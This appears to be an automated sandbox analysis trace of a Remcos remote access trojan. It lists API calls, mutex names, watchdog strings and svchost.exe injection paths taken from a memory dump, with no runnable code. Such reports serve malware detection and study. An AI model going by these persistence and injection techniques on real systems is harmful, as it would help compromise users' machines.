                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                          • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                          • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                          • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                        • _wgetenv.MSVCRT ref: 0040A7B3
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                        • _wgetenv.MSVCRT ref: 0040A758
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                        • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                        • CloseHandle.KERNEL32 ref: 0040A8AA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                        • API String ID: 2208868093-2207663338
                                        • Opcode ID: 9091c6b63f88cba4044878423eae5b724ce617bbc0aba149de81e8580702b54f
                                        • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                        • Opcode Fuzzy Hash: 9091c6b63f88cba4044878423eae5b724ce617bbc0aba149de81e8580702b54f
                                        • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                         Uniqueness
                                         • Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                        • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                        • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                        • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                        • wcslen.MSVCRT ref: 00409C25
                                        • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                        • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                        • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                        • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                          • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                        • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                        • API String ID: 2459104678-694575909
                                        • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                        • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                        • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                        • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                         Uniqueness
                                         • Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 004105AD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                        • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                        • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
